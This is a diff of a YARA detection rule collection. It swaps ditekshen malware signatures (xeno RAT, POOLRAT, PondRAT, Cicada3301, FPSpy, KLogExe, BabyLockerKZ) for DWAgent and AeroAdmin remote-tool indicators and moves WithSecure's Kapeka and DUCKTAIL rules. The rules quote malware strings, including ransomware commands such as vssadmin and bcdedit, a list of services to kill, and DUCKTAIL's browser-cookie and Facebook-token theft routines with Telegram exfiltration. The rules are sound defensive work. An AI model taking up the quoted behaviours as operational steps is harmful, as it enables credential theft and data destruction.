 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "487046464f545fb9e4a1d6e277cdc010eac6886583f0b388555a483d9021191b"
+		logic_hash = "f1fe2d2bb6a8afd25fc5ee7a60fe5a931484591bafab24c5d488c7f0483e248a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "xeno rat client" wide
-		$x2 = "xeno_rat_client." ascii
-		$x3 = "xeno rat client" ascii
-		$s1 = "+<AddToStartupNonAdmin>" ascii
-		$s2 = "+<ConnectAndSetupAsync>" ascii
-		$s3 = "+<SendUpdateInfo>" ascii
-		$s4 = "+<RecvAllAsync_ddos_" ascii
-		$s5 = "Plugin.Chromium+<Get" ascii
+		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) or ( 2 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "GlobalSign" and ( pe.signatures [ i ] . subject contains "Aeroadmin LLC" or pe.signatures [ i ] . subject contains "@aeroadmin.com" ) )
 }
-rule DITEKSHEN_MALWARE_Multi_POOLRAT : FILE
+rule DITEKSHEN_INDICATOR_RMM_Dwagentlib : FILE
 {
 	meta:
-		description = "Detects POOLRAT"
-		author = "ditekshen"
-		id = "5831b479-592d-591b-88b4-73102fe4b6ec"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11822-L11839"
+		description = "Detect DWAgent Remote Administration Tool library"
+		author = "ditekSHen"
+		id = "af0f9940-fbec-5775-9b74-bd73b55ec0ca"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L463-L482"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "efc5881975e97583188d43a8a6b0eb59bb7103664897cc0f88ddc4d2376bd842"
+		logic_hash = "608dd9bc8cfcec5a671bee9456dccedace31d7ae37180387ac2408f79fd9f452"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Osx.Trojan.POOLRAT"
-		clamav2 = "MALWARE.Linux.Trojan.POOLRAT"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-LIB"
 
 	strings:
-		$s1 = "MSG_CmdP" ascii
-		$s2 = "MSG_WriteConfigP" ascii
-		$s3 = "MSG_SecureDelP" ascii
-		$s4 = "ConnectToProxyP" ascii
-		$s5 = "MSG_KeepConP" ascii
-		$s6 = "MSG_SleepP" ascii
-		$s7 = "MSG_TestP" ascii
-		$s8 = "MSG_SetPathP" ascii
+		$s1 = "DWAgentLib" fullword wide
+		$s2 = "PYTHONHOME" fullword wide
+		$s3 = "isTaskRunning" fullword ascii
+		$s4 = "isUserInAdminGroup" fullword ascii
+		$s5 = "setFilePermissionEveryone" fullword ascii
+		$s6 = "startProcessInActiveConsole" fullword ascii
+		$s7 = "taskKill" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Multi_Pondrat : FILE
+rule DITEKSHEN_INDICATOR_RMM_Dwagentsvc : FILE
 {
 	meta:
-		description = "Detects PondRAT"
-		author = "ditekshen"
-		id = "cb8cca87-6b5e-5984-8a73-9f800b262d77"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11841-L11858"
+		description = "Detect DWAgent Remote Administration Tool service"
+		author = "ditekSHen"
+		id = "5d124c20-a0f8-5e82-8bab-93a782a2a649"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L484-L501"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "affa35f789725d3a8cea8dc95744c4e771690fde5f73936d0806a8c9f72fdb2e"
+		logic_hash = "590d41d2e433a7a1bb373fbd0b0d47818a9867bee0399101881b05e83b586f6e"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		clamav1 = "MALWARE.Osx.Trojan.PondRAT"
-		clamav2 = "MALWARE.Linux.Trojan.PondRAT"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-SVC"
 
 	strings:
-		$s1 = "MsgDown" ascii
-		$s2 = "MsgUp" ascii
-		$s3 = "MsgRun" ascii
-		$s4 = "MsgCmd" ascii
-		$s5 = "CryptPayload" ascii
-		$s6 = "RecvPayload" ascii
-		$s7 = "csleepi" ascii
-		$s8 = "FConnectProxy" ascii
+		$s1 = "\\native\\dwagupd.dll" wide
+		$s2 = "\\native\\dwagsvc.exe\" run" wide
+		$s3 = "CreateServiceW" fullword ascii
+		$s4 = /dwagent\.(pid|start|stop)/ wide
+		$s5 = "Check updating..." wide
 
 	condition:
-		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Cicada3301 : FILE
+rule DITEKSHEN_INDICATOR_RMM_Dwagent_Screencapture : FILE
 {
 	meta:
-		description = "Detects Cicada3301"
-		author = "ditekshen"
-		id = "0aebee9f-177d-5a1b-87e0-8797fb6f6823"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11860-L11885"
+		description = "Detect DWAgent Remote Administration Tool Screen Capture Module"
+		author = "ditekSHen"
+		id = "79586e5e-b7e5-5adc-97f3-0d29ad695079"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L503-L528"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b8b7596bc8ae01b89742e17bd3dbfcc1e2fad486cc6ea19c8de813fc677509f4"
+		logic_hash = "d3160fd4cce445aa6d2bc6c083893c7610ea5e72824fe9824ad853700f4d3874"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Ransomware.Cicada3301"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-ScreenCapture"
 
 	strings:
-		$s1 = "cmd/Cchcp 65001 >nulnet view \\\\"
-		$s2 = "create_file_recovery"
-		$s3 = "ecnrypted_files_full"
-		$s4 = "get_excluded_directories"
-		$s5 = "collect_files_except"
-		$s6 = ".exe4d5a" ascii
-		$s7 = "-accepteula -s -d \"\" --" ascii
-		$s8 = "[*.exe*.EXE*.DLL*.ini*.inf*.pol*.cmd*.ps1*.vbs*.bat*.pagefile.sys*.hiberfil.sys*.drv" ascii
-		$s9 = "memtasveeamsvc$backupsqlvssmsexchangesql$mysqlmysql$sophosMSExchange" ascii
-		$s10 = "-DATA.txt" ascii
-		$s11 = /--no_(local|net|impl)/ fullword ascii
-		$c1 = "fsutil" ascii
-		$c2 = "iisreset" ascii
-		$c3 = "vssadmin" ascii
-		$c4 = "wmic" ascii
-		$c5 = "bcdedit" ascii
-		$c6 = "wevtutil" ascii
+		$s1 = "DWAgentLib" fullword wide
+		$s2 = "PYTHONHOME" wide
+		$s3 = "VirtualBox" wide
+		$s4 = "VMware" wide
+		$s5 = "ScreenCapture::prepareCursor#" ascii
+		$s6 = "ScreenCapture::getMonitorCount#" ascii
+		$s7 = "ScreenCapture::token" ascii
+		$s8 = "dwascreencapture" ascii
+		$s9 = "inputKeyboard CTRLALTCANC" ascii
+		$s10 = "_Z34ScreenCaptureNativeMonitorEnumProc" ascii
+		$s11 = "_Z41ScreenCaptureNativeCreateWindowThreadProc" ascii
+		$s12 = "_ZN13ScreenCapture" ascii
+		$s13 = "isUserInAdminGroup" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 4 of ( $c* ) and 4 of ( $s* ) ) or ( all of ( $c* ) and 2 of ( $s* ) ) or 9 of them )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_MALWARE_Win_Fpspy : FILE
+rule DITEKSHEN_INDICATOR_RMM_Dwagent_Soundcapture : FILE
 {
 	meta:
-		description = "FPSpy"
-		author = "ditekshen"
-		id = "39d3be12-1b06-57b1-b3c2-2cbd13a17b03"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11887-L11916"
+		description = "Detect DWAgent Remote Administration Tool Sound Capture Module"
+		author = "ditekSHen"
+		id = "4e395d1e-96a1-5ecc-abe5-6f8323a2c8ca"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L530-L545"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c26736c7f056f3d13c58e724fda601e88468e2386852b072a37c6646fb5ef8f9"
+		logic_hash = "c0efa9f383373dec1c5b9d127c2b4c6f4906718ae8f62eea28d7a369001be5af"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.FPSpy"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-SoundCapture"
 
 	strings:
-		$f1 = "[Analys_Spy]" wide
-		$f2 = "[DeletePoorDll]" wide
-		$f3 = "[DownloadProc]" wide
-		$f4 = "[DragWarp]" wide
-		$f5 = "[GetCoolDir]" wide
-		$f6 = "[JackSleep]" wide
-		$f7 = "[KillCmdExe]" wide
-		$f8 = "[PsDownProc]" wide
-		$f9 = "[PsUpProc]" wide
-		$f10 = "[ReadFileFromPacket]" wide
-		$f11 = "[RemoteDropExec]" wide
-		$f12 = "[RemoteExec]" wide
-		$f13 = "[RemoteInject]" wide
-		$f14 = "[SendHttpForUpload]" wide
-		$s1 = "MazeFunc" fullword ascii
-		$s2 = /(Exit|Update|Drop)_EVT/ fullword ascii
-		$s3 = "Key.dat" fullword ascii
-		$s4 = "%sSysInfo_%02d_%02d_%02d.txt" fullword ascii
-		$s5 = "cmd /c systeminfo >> %s" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
-		$s7 = "FPSpy" fullword wide
+		$s1 = "DWASoundCapture" ascii
+		$s2 = /_Z\d{2}DWASoundCapture/ ascii
+		$s3 = "_Z6recordPvS_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( pe.exports ( "MazeFunc" ) and 2 of ( $f* ) and 1 of ( $s* ) ) or ( 6 of ( $f* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $f* ) ) or ( 8 of ( $f* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Klogexe : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Dwagent_CERT : FILE
 {
 	meta:
-		description = "Detects KLogExe"
-		author = "ditekshen"
-		id = "8c3ebc2c-717b-5c42-9233-274006d4331b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11918-L11937"
+		description = "Detects DWAgent by certificate. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "96572e83-ffb9-58d9-93d1-84e16ae1a3ba"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L547-L563"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1f1809b83dc468122022b68d63734ba1597c6fede01582c31d1700ca0b9e1e22"
+		logic_hash = "9ed86f053c8d1423aae8cfc6e0bba6021510dfb6d722430c8c7edb15d3e8233a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.KLogExe"
-
-	strings:
-		$s1 = "[clip_s]: %s" ascii
-		$s2 = "------ %d/%d/%d : %d/%d ------" ascii
-		$s3 = "[RWin+]" ascii
-		$s4 = "[Too many clip_tail]" ascii
-		$s5 = "name=\"userfile\"; filename=\"%s\"" ascii
-		$s6 = "Origin: http://" wide
-		$s7 = "%s_%d_%d_%d_%d" wide
-		$s8 = "/wp-content/include.php?_sys_" wide
-		$s9 = "\\desktops.ini" wide
-		$s10 = "KLogExe" wide nocase
-		$s11 = "dynamic_import.cpp [resolve_call] can`nt" wide
+		thumbprint = "4a13f46def2c9427898a46a88a6a2122ed106b37"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DWSNET srl" and pe.signatures [ i ] . issuer contains "Sectigo Public Code Signing CA R36" and pe.signatures [ i ] . serial == "00:af:bd:d3:be:b2:4e:1d:e7:37:82:e9:f8:34:7c:f1:53" )
 }
-rule DITEKSHEN_MALWARE_Win_Babylockerkz : FILE
+rule DITEKSHEN_INDICATOR_OSX_RMM_Dwagent : FILE
 {
 	meta:
-		description = "Detects BabyLockerKZ"
-		author = "ditekshen"
-		id = "faa35818-2bed-528f-a6f0-5356a723ef5b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11939-L11957"
+		description = "Detect DWAgent Remote Administration Tool macOS run"
+		author = "ditekSHen"
+		id = "0eeb9ae3-826e-52b7-bbb8-3f8c4920f5c3"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L565-L580"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "423bbd3b23591608a32e4e724c156fbaa5d1d087515137a82a0aeb8c4865d1ca"
+		logic_hash = "9864668abdd534d8a33940f9513d07356451ce1eaa9233771e82b8138dc0b41b"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Osx.RMM.DWAgent-RUN"
 
 	strings:
-		$s1 = ":\\locker\\bin\\stub_win_x64_encrypter.pdb" ascii
-		$s2 = "taskkill /f /im explorer.exe" fullword wide
-		$s3 = "\\SysWOW64\\cmd.exe /c %windir%\\" wide
-		$s4 = "[!] Failed to RunNonElevated: %s, error 0x%X" fullword wide
-		$s5 = "[!] Failed to run sync command: %s, error 0x%X" fullword wide
-		$s6 = "[-] RunNonElevated: %s" fullword wide
-		$s7 = "[!][Encrypt] Not" fullword
-		$s8 = "[-] sALLUSERSPROFILE: %s" fullword wide
-		$s9 = "[!] WNetGetConnection failed 0x%X" fullword wide
-		$s10 = "[!][Scan] " wide
-		$s11 = "[-] Start encrypt" wide
+		$s1 = "net.dwservice.DWAgent" ascii
+		$s2 = "-[DWADelegate" ascii
+		$s3 = "customWindowsToEnterFullScreenForWindow:onScreen:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0xfeca and all of them
 }
 /*
  * YARA Rule Set
  * Repository Name: WithSecureLabs
  * Repository: https://github.com/WithSecureLabs/iocs
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 303d48d900d24dbf0f1c17429bfe051eed995d29
  * Number of Rules: 15
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -217605,193 +217728,6 @@ CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  */
-
-rule WITHSECURELABS_Kapeka_Backdoor : FILE
-{
-	meta:
-		description = "Detects Kapeka backdoor based on common strings."
-		author = "WithSecure"
-		id = "7b874a4a-a009-5365-9c31-ca61bf5ab491"
-		date = "2024-04-17"
-		modified = "2024-04-17"
-		reference = "https://labs.withsecure.com/publications/kapeka"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/Kapeka/kapeka_backdoor.yar#L2-L21"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
-		logic_hash = "49795c6e3f3690eeccd731a9ba0c6bd8d5840d9171939e71d3a4d6f0d1834f05"
-		score = 75
-		quality = 25
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "97e0e161d673925e42cdf04763e7eaa53035338b"
-		hash2 = "9bbde40cab30916b42e59208fbcc09affef525c1"
-		hash3 = "6c3441b5a4d3d39e9695d176b0e83a2c55fe5b4e"
-
-	strings:
-		$a = "Azbi3l1xIgcRzTsOHopgrwUdJUMWpOFt" ascii
-		$b = "PID : " wide
-		$c = "ExitCode : " wide
-		$d = "1: " wide
-		$e = "2: " wide
-
-	condition:
-		pe.is_dll( ) and filesize > 50000 and filesize < 500000 and 4 of them
-}
-rule WITHSECURELABS_Ducktail_Artifacts : FILE
-{
-	meta:
-		description = "Detects artifacts found in files associated to DUCKTAIL malware"
-		author = "WithSecure"
-		id = "937c9688-b74f-5e02-838f-ab6757a8d2a1"
-		date = "2022-07-18"
-		modified = "2022-07-26"
-		reference = "https://labs.withsecure.com/publications/ducktail"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/DUCKTAIL/ducktail_artifacts.yar#L1-L20"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
-		logic_hash = "1daa5e654058c802826b6a306b5bfc9d0c05c4ee54607e94e618a8d409ce74d9"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "3dbd9e1c3d0fd6358d4adcba04fdfc0b6e8acc49"
-		hash2 = "9370243589327b458486e3f7637779c2a96b4250"
-		hash3 = "b98170b18b906aee771dbd4dbd31e5963a90a50e"
-
-	strings:
-		$pdb_path_1 = /[a-z]\:\\projects\\(viruttest|virot)\\/i nocase ascii
-		$pdb_path_2 = /[a-z]\:\\users\\ductai\\/i nocase ascii
-		$pdb_path_3 = "\\dataextractor.pdb" nocase ascii
-		$email = "ductai2308@gmail.com" wide ascii
-
-	condition:
-		uint16( 0 ) == 0x5A4D and any of them
-}
-rule WITHSECURELABS_Ducktail_Dotnet_Core_Infostealer : FILE
-{
-	meta:
-		description = "Detects DUCKTAIL malware written in .NET Core"
-		author = "WithSecure"
-		id = "22eef7ce-9e11-55ec-9f0b-00a6776f8eee"
-		date = "2022-07-18"
-		modified = "2022-07-25"
-		reference = "https://labs.withsecure.com/publications/ducktail"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/DUCKTAIL/ducktail_dotnet_core_infostealer.yar#L1-L103"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
-		logic_hash = "81b4da5860894397e9cd416e451c3098f8560407cd79f070f8edd5a3ba91512a"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "b260f3857990e11fa267d3f1cad4c9bed59a9d4b"
-		hash2 = "db74863c01817bf4eba39cd8a0ebbce9bda85a37"
-		hash3 = "3a4b395301f61b7e6afc0ab27dc02331455181d0"
-
-	strings:
-		$dotnet_core_bundle_signature = { 8B 12 02 B9 6A 61 20 38 72 7B 93 02 14 D7 A0 32 13 F5 B9 E6 EF AE 33 18 EE 3B 2D CE 24 B3 6A AE }
-		$fb_str_1 = "c_user" wide ascii
-		$fb_str_2 = "https://business.facebook.com/security/twofactor/reauth/enter" wide ascii
-		$fb_str_3 = "https://business.facebook.com/security/twofactor/reauth" wide ascii
-		$fb_str_4 = "mbasic.facebook.com" wide ascii
-		$fb_str_5 = "DTSGInitData\",[],{\"token\":\"" wide ascii
-		$fb_str_6 = "www.facebook.com" wide ascii
-		$fb_str_7 = "m.facebook.com" wide ascii
-		$fb_str_8 = "business.facebook.com" wide ascii
-		$fb_str_9 = "approvals_code=" wide ascii
-		$fb_str_10 = "c_user=" wide ascii
-		$fb_str_11 = "&__a=1&__comet_req=0&fb_dtsg=" wide ascii
-		$fb_str_12 = "&__jssesw=1" wide ascii
-		$fb_str_13 = "approvals_code=" wide ascii
-		$fb_str_14 = "<BmLinks>k__BackingField" wide ascii
-		$fb_str_15 = "set_FbCookies" wide ascii
-		$fb_str_16 = "<AdsAccount>k__BackingField" wide ascii
-		$fb_str_17 = "GetAllFbData" wide ascii
-		$fb_str_18 = "get_account_id" wide ascii
-		$fb_str_19 = "set_BmLinks" wide ascii
-		$fb_str_20 = "GetBmLink" wide ascii
-		$fb_str_21 = "GetBm" wide ascii
-		$fb_str_22 = "ExtractUserId" wide ascii
-		$fb_str_23 = "set_Bussinesses" wide ascii
-		$fb_str_24 = "set_FbData" wide ascii
-		$fb_str_25 = "get_Nguong" wide ascii
-		$fb_str_26 = "ResetCookie" wide ascii
-		$fb_str_27 = "set_UserId" wide ascii
-		$fb_str_28 = "<Nguong>k__BackingField" wide ascii
-		$fb_str_29 = "get_UserId" wide ascii
-		$fb_str_30 = "set_Nguong" wide ascii
-		$fb_str_31 = "AdsBusiness" wide ascii
-		$fb_str_32 = "<FbData>k__BackingField" wide ascii
-		$fb_str_33 = "<FbCookies>k__BackingField" wide ascii
-		$fb_str_34 = "<invite_link>k__BackingField" wide ascii
-		$fb_str_35 = "get_FbData" wide ascii
-		$fb_str_36 = "get_invite_link" wide ascii
-		$fb_str_37 = "get_Bussinesses" wide ascii
-		$fb_str_38 = "GetNguong" wide ascii
-		$fb_str_39 = "set_AdsAccount" wide ascii
-		$fb_str_40 = "set_invite_link" wide ascii
-		$fb_str_41 = "set_AllCookies" wide ascii
-		$fb_str_42 = "get_business" wide ascii
-		$fb_str_43 = "set_business" wide ascii
-		$fb_str_44 = "<Bussinesses>k__BackingField" wide ascii
-		$fb_str_45 = "GetAdsFromToken" wide ascii
-		$fb_str_46 = "get_AdsAccount" wide ascii
-		$fb_str_47 = "get_BmLinks" wide ascii
-		$fb_str_48 = "FbDataScanner" wide ascii
-		$exfil_str_1 = "telegramBotClient_OnUpdate" wide ascii
-		$exfil_str_2 = "telegramHandler" wide ascii
-		$exfil_str_3 = "ZipArchive" wide ascii
-		$exfil_str_4 = "KillItSame" wide ascii
-		$exfil_str_5 = "1.txt" wide ascii
-		$exfil_str_6 = ".zip" wide ascii
-		$exfil_str_7 = "2.txt" wide ascii
-		$browser_str_1 = "GetCookies" wide ascii
-		$browser_str_2 = "get_AllCookies" wide ascii
-		$browser_str_3 = "ChromiumBrowser" wide ascii
-		$browser_str_4 = "myBrowsers" wide ascii
-		$browser_str_5 = "get_CookiePath" wide ascii
-		$browser_str_6 = "ScanFirefox" wide ascii
-		$browser_str_7 = "get_FbCookies" wide ascii
-		$browser_str_8 = "ScanChomium" wide ascii
-		$browser_str_9 = "BrowserScanner" wide ascii
-		$browser_str_10 = "ScanChronium" wide ascii
-		$browser_str_11 = "CookieData" wide ascii
-		$browser_str_12 = "listBrowser" wide ascii
-		$browser_str_13 = "BrowserCookie" wide ascii
-		$browser_str_14 = "<Cookies>k__BackingField" wide ascii
-		$browser_str_15 = "AddCookie" wide ascii
-		$browser_str_16 = "set_CookiePath" wide ascii
-		$browser_str_17 = "Local State" wide ascii
-		$browser_str_18 = "select name, path, expires_utc, is_secure, is_httponly, host_key, encrypted_value  from cookies" wide ascii
-		$browser_str_19 = "Google\\Chrome\\User Data" wide ascii
-		$browser_str_20 = "Microsoft\\Edge\\User Data" wide ascii
-		$browser_str_21 = "Cookies" wide ascii
-		$browser_str_22 = "encrypted_key\":\"" wide ascii
-
-	condition:
-		uint16( 0 ) == 0x5A4D and $dotnet_core_bundle_signature and ( ( 7 of ( $fb_str_* ) and ( 7 of ( $browser_str_* ) or 3 of ( $exfil_str_* ) ) ) or ( 7 of ( $browser_str_* ) and 3 of ( $exfil_str_* ) ) )
-}
-
-rule WITHSECURELABS_Ducktail_Nativeaot : FILE
-{
-	meta:
-		description = "Detects NativeAOT variants of DUCKTAIL malware"
-		author = "WithSecure"
-		id = "1961d3e1-987b-588b-bfc2-8239797cd049"
-		date = "2022-11-17"
-		modified = "2022-11-22"
-		reference = "https://labs.withsecure.com/publications/ducktail_returns"
-		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/DUCKTAIL/ducktail_nativeaot.yara#L2-L22"
-		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
-		logic_hash = "976b28ac45e5a13d4ce900b857e6bd3afc82b65b0235791fd698b762287cd60e"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		version = "1.0"
-		hash1 = "b043e4639f89459cae85161e6fbf73b22470979e"
-		hash2 = "073b092bf949c31628ee20f7458067bbb05fda3a"
-		hash3 = "d1f6b5f9718a2fe9eaac0c1a627228d3f3b86f87"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 15MB and ( pe.section_index ( ".managed" ) >= 0 or pe.exports ( "DotNetRuntimeDebugHeader" ) ) and pe.exports ( "SendFile" ) and pe.exports ( "Start" ) and pe.exports ( "Open" )
-}
 rule WITHSECURELABS_Tanglecrypt : FILE
 {
 	meta:
@@ -218002,7 +217938,7 @@ rule WITHSECURELABS_Andariel_Jelusrat_PDB : FILE
 		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
 		logic_hash = "a14d808ff783b7c42f3e4600386d578d63c88a0cd7c492cb1a026e0580b551f3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
@@ -218032,6 +217968,193 @@ rule WITHSECURELABS_Andariel_Jelusrat_Plugin
 		pe.exports( "testPlugin" ) and pe.exports ( "beginPlugin" ) and pe.exports ( "endPlugin" ) and pe.exports ( "processCommand" )
 }
 
+rule WITHSECURELABS_Kapeka_Backdoor : FILE
+{
+	meta:
+		description = "Detects Kapeka backdoor based on common strings."
+		author = "WithSecure"
+		id = "7b874a4a-a009-5365-9c31-ca61bf5ab491"
+		date = "2024-04-17"
+		modified = "2024-04-17"
+		reference = "https://labs.withsecure.com/publications/kapeka"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/Kapeka/kapeka_backdoor.yar#L2-L21"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/303d48d900d24dbf0f1c17429bfe051eed995d29/LICENSE"
+		logic_hash = "49795c6e3f3690eeccd731a9ba0c6bd8d5840d9171939e71d3a4d6f0d1834f05"
+		score = 75
+		quality = 25
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "97e0e161d673925e42cdf04763e7eaa53035338b"
+		hash2 = "9bbde40cab30916b42e59208fbcc09affef525c1"
+		hash3 = "6c3441b5a4d3d39e9695d176b0e83a2c55fe5b4e"
+
+	strings:
+		$a = "Azbi3l1xIgcRzTsOHopgrwUdJUMWpOFt" ascii
+		$b = "PID : " wide
+		$c = "ExitCode : " wide
+		$d = "1: " wide
+		$e = "2: " wide
+
+	condition:
+		pe.is_dll( ) and filesize > 50000 and filesize < 500000 and 4 of them
+}
